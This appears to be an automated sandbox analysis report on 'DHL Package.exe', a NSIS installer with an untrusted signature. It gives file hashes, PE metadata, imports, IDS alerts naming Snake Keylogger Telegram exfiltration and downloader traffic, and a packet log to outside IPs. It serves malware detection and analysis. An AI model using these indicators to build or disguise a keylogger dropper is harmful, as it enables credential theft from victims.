                                                                                              Preview:.....{...?.)....=..............C.....]..."u...SX......+WI...,...`..........v.N...m.BR.%(.............[...C.....D..I.XB..$.....................O.2...........r..e..`.U......z.y_9..K.....1.._(........<..(......h.........L....M....x...S&....{.a................u;.....~......Ru....O.....a......c...6..;...7.............1..u..)r......z.U&....t.......Q........}.........b...m.... .............D...s..........._G....M.....Q..Zd.._...9........K......b).......!....Z..N..o^.a......`..2.......................n........H....E..T...9......~.Zx..8....g.....S..=.L.......S[......y......9..W............T...............v................j.p..?......[..............*......O...,.2.................#.....|....?.,...Vv.....XS.X.:...z.....p.v.......L......I..............4..{.........B'!..3....../n......lR.#........(........Y.7...0/....X............~.....3.............Ht..a.Sh'=.................#..%..4............-.h...:1.............(............;.2...E......................' .,...F..........Y..\..... ....g.
                                                                                              Process:C:\Users\user\Desktop\DHL Package.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):7829
                                                                                              Entropy (8bit):4.964465618724154
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:cvQVyl9vo9vkEB/g8s5GI4SGvPEu/mVI1PVpb80:c4V4xbEdR8T4SaFuVI7
                                                                                              MD5:2BB28D61DDF2533CCBB803DDBE326BDC
                                                                                              SHA1:8B7C2571F544EC2AED6AC232D561FEE3016D99C8
                                                                                              SHA-256:D757263BDBCDB4AE46691DF9BCB12E168F745A5716A9FEEA75C20E359E2AD2AF
                                                                                              SHA-512:66DDBF35BA173A8DCC8204426E66200436347890D2154A8BC604CDBE2DA59577DCC35156D1A4CE46CF1E775D0E9AA6E875C28841B4F7ADC78A77C7501E285CC8
                                                                                              Malicious:false
                                                                                              Preview:...M.x....7..................+.R...Z"W.]....l.+...5..^........N^...W.....?....}.I......................................^.2.x...V....Q......................q......p2...^...............%..|.....@.8.^..S.L';....a.....t...]..t}...f....ML.....&..........................~a......=... ...&.....%-..'.I.............7.......$.................,......j.......NJhh....'.#k.K......0..M.h.....&...T........./..........Z\..............4....L....M.......&.}..........(R.....@..0...X..?.1...b....pM.......F....L.G..y....8yA%..E.....^...............\.N.....M..[.......<...T....u........i......i..............._.........._I.....A.................N..'.....@.............l.....1..............#..........f..w=.....el..h.7*... $....~..................x....]..R..7...........P."..........Y.l}....."......R........j........ ............1......}..........._......!..................*..................%a"w...........N..........%....`....3.........^.....OU.F....E..8.]..U.............:..z[...9g...'....^*........
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Entropy (8bit):7.915503481056126
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:DHL Package.exe
                                                                                              File size:352'704 bytes
                                                                                              MD5:ceb0fc229f47b61909ce0e6a68dd191f
                                                                                              SHA1:93862169c62ec357ae869c50e5249fc16bab9cc9
                                                                                              SHA256:4f3ec860e9371f32df06c6d342b6e16bdc8ad4c08aeeaa8f2a66549750805603
                                                                                              SHA512:144d51e428158fc1f0c4b35d49c658f4665ac5a2bf2622aed782dfc87aa45155f9c9e55d79f21abf8a2af5742405d4f3505f158ae2992d63430fa5db1076fb64
                                                                                              SSDEEP:6144:VMm4CCe7+uZAh8J7OPYkexqSiLIQ0QfCqJ6v58FG9bBo6zEJR2X3g38Gn6s9l/cK:VMwAeAdexqSiX0oC9v9b66zSR2HgsGnj
                                                                                              TLSH:3274122432B0D417E1AE5534587ADBB68BF9F24B20B0934F37507F4FB920A91AF19B85
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......`.................f...*.....
                                                                                              Icon Hash:3179715bd1412531
                                                                                              Entrypoint:0x40348f
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x60FC9193 [Sat Jul 24 22:17:55 2021 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                                                                              Signature Valid:false
                                                                                              Signature Issuer:CN="Puzzlers Carboniferous ", O=Rusfesten, L=Saint-Flour, S=Auvergne-Rh\xf4ne-Alpes, C=FR
                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                              Error Number:-2146762487
                                                                                              Not Before, Not After
                                                                                              • 31/01/2024 11:29:47 30/01/2027 11:29:47
                                                                                              Subject Chain
                                                                                              • CN="Puzzlers Carboniferous ", O=Rusfesten, L=Saint-Flour, S=Auvergne-Rh\xf4ne-Alpes, C=FR
                                                                                              Version:3
                                                                                              Thumbprint MD5:CAD4AA9BC94C673CBFC2B3D047E99128
                                                                                              Thumbprint SHA-1:053E4B9235060E1A0955C6D003E1EE5CFB7C46B3
                                                                                              Thumbprint SHA-256:C57D17F0A46275CD75006544EB7EA4258CF9A83B1DD742474BAD376B2B0C00EA
                                                                                              Serial:7A2D03761AD4BA8E2D1A7A6B07F7DB907512E4DD
                                                                                              Instruction
                                                                                              sub esp, 000002D4h
                                                                                              push ebx
                                                                                              push esi
                                                                                              push edi
                                                                                              push 00000020h
                                                                                              pop edi
                                                                                              xor ebx, ebx
                                                                                              push 00008001h
                                                                                              mov dword ptr [esp+14h], ebx
                                                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                                                              mov dword ptr [esp+1Ch], ebx
                                                                                              call dword ptr [004080CCh]
                                                                                              call dword ptr [004080D0h]
                                                                                              and eax, BFFFFFFFh
                                                                                              cmp ax, 00000006h
                                                                                              mov dword ptr [0042A22Ch], eax
                                                                                              je 00007F6518854013h
                                                                                              push ebx
                                                                                              call 00007F6518857301h
                                                                                              cmp eax, ebx
                                                                                              je 00007F6518854009h
                                                                                              push 00000C00h
                                                                                              call eax
                                                                                              mov esi, 004082B0h
                                                                                              push esi
                                                                                              call 00007F651885727Bh
                                                                                              push esi
                                                                                              call dword ptr [00408154h]
                                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                                              cmp byte ptr [esi], 00000000h
                                                                                              jne 00007F6518853FECh
                                                                                              push 0000000Bh
                                                                                              call 00007F65188572D4h
                                                                                              push 00000009h
                                                                                              call 00007F65188572CDh
                                                                                              push 00000007h
                                                                                              mov dword ptr [0042A224h], eax
                                                                                              call 00007F65188572C1h
                                                                                              cmp eax, ebx
                                                                                              je 00007F6518854011h
                                                                                              push 0000001Eh
                                                                                              call eax
                                                                                              test eax, eax
                                                                                              je 00007F6518854009h
                                                                                              or byte ptr [0042A22Fh], 00000040h
                                                                                              push ebp
                                                                                              call dword ptr [00408038h]
                                                                                              push ebx
                                                                                              call dword ptr [00408298h]
                                                                                              mov dword ptr [0042A2F8h], eax
                                                                                              push ebx
                                                                                              lea eax, dword ptr [esp+34h]
                                                                                              push 000002B4h
                                                                                              push eax
                                                                                              push ebx
                                                                                              push 004216C8h
                                                                                              call dword ptr [0040818Ch]
                                                                                              push 0040A2C8h
                                                                                              Programming Language:
                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x3488.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x558300x990.ndata
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x64110x66001be075c408f39c844a297d85521f5b93False0.6545266544117647data6.40243296676441IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0xa0000x203380x60092925084f722469459e6111e8ee4a9d0False0.5013020833333334data4.020801365171916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .ndata0x2b0000x2e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x590000x34880x3600364d310ee66e735e33bf251142f51d25False0.5782696759259259data5.662210675483562IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x593280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.7673240938166311
                                                                                              RT_ICON0x5a1d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.802797833935018
                                                                                              RT_ICON0x5aa780x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.38414634146341464
                                                                                              RT_ICON0x5b0e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.7001445086705202
                                                                                              RT_ICON0x5b6480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4381720430107527
                                                                                              RT_ICON0x5b9300x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5405405405405406
                                                                                              RT_DIALOG0x5ba580xb8dataEnglishUnited States0.6467391304347826
                                                                                              RT_DIALOG0x5bb100x144dataEnglishUnited States0.5216049382716049
                                                                                              RT_DIALOG0x5bc580x100dataEnglishUnited States0.5234375
                                                                                              RT_DIALOG0x5bd580x11cdataEnglishUnited States0.6056338028169014
                                                                                              RT_DIALOG0x5be780x60dataEnglishUnited States0.7291666666666666
                                                                                              RT_GROUP_ICON0x5bed80x5adataEnglishUnited States0.7111111111111111
                                                                                              RT_VERSION0x5bf380x2c0dataEnglishUnited States0.4715909090909091
                                                                                              RT_MANIFEST0x5c1f80x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5640243902439024
                                                                                              DLLImport
                                                                                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States
                                                                                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                                                              2024-08-07T09:28:23.238618+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974180192.168.11.20132.226.247.73
                                                                                              2024-08-07T09:28:34.383581+0200TCP2853006ETPRO MALWARE Snake Keylogger Telegram Exfil149750443192.168.11.20149.154.167.220
                                                                                              2024-08-07T09:28:18.208911+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974180192.168.11.20132.226.247.73
                                                                                              2024-08-07T09:28:21.129680+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974180192.168.11.20132.226.247.73
                                                                                              2024-08-07T09:28:26.441063+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974180192.168.11.20132.226.247.73
                                                                                              2024-08-07T09:28:22.862325+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349745443192.168.11.20172.67.177.134
                                                                                              2024-08-07T09:28:20.067426+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974180192.168.11.20132.226.247.73
                                                                                              2024-08-07T09:28:24.316459+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974180192.168.11.20132.226.247.73
                                                                                              2024-08-07T09:28:21.807309+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349744443192.168.11.20172.67.177.134
                                                                                              2024-08-07T09:28:26.060314+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349748443192.168.11.20172.67.177.134
                                                                                              2024-08-07T09:28:23.929722+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349746443192.168.11.20172.67.177.134
                                                                                              2024-08-07T09:28:24.986734+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349747443192.168.11.20172.67.177.134
                                                                                              2024-08-07T09:28:20.751723+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349743443192.168.11.20172.67.177.134
                                                                                              2024-08-07T09:28:22.191952+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974180192.168.11.20132.226.247.73
                                                                                              2024-08-07T09:28:15.598712+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa24974080192.168.11.20172.93.120.113
                                                                                              2024-08-07T09:28:27.118767+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349749443192.168.11.20172.67.177.134
                                                                                              2024-08-07T09:28:25.394377+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974180192.168.11.20132.226.247.73
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Aug 7, 2024 09:28:15.129513979 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.361756086 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.362138987 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.363061905 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.597816944 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.598361015 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.598457098 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.598711967 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.600583076 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.600677967 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.600832939 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.600893021 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.602659941 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.602754116 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.602953911 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.602953911 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.604878902 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.604979992 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.605086088 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.605148077 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.606971025 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.607065916 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.607184887 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.607306957 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.832040071 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.832145929 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.832262039 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.832340002 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.832401037 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.832401037 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.832465887 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.832704067 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.833622932 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.833724022 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.833847046 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.834053993 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.835791111 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.835885048 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.836055994 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.836117029 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.837977886 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.838072062 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.838360071 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.840136051 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.840279102 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.840357065 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.840500116 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.842446089 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.842540026 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.842689991 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.842746973 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.844644070 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.844741106 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.844960928 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.844961882 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.846651077 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.846745968 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.846865892 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.847031116 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.848773956 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.848884106 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:15.848982096 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:15.849239111 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.064600945 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.064724922 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.064821005 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.064822912 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.064896107 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.064986944 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.065068007 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.065121889 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.066787004 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.066890001 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.067028046 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.067084074 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.068849087 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.068945885 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.069070101 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.069134951 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.071069002 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.071163893 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.071357965 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.071357965 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.073167086 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.073266029 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.073359013 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.073513985 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.075582027 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.075676918 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.075799942 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.075943947 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.077702045 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.077799082 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.077918053 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.077980995 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.079873085 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.079972029 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.080074072 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.080137968 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.082010031 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.082129002 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.082290888 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.082433939 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.084135056 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.084289074 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.084367990 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.084467888 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.086328030 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.086410999 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.086628914 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.088536024 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.088634014 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.088757038 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.088836908 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.090579987 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.090673923 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.090799093 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.090858936 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.092922926 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.093019962 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.093244076 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.093244076 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.095026016 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.095120907 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.095241070 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.095334053 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.097135067 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.097229004 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.097349882 CEST4974080192.168.11.20172.93.120.113
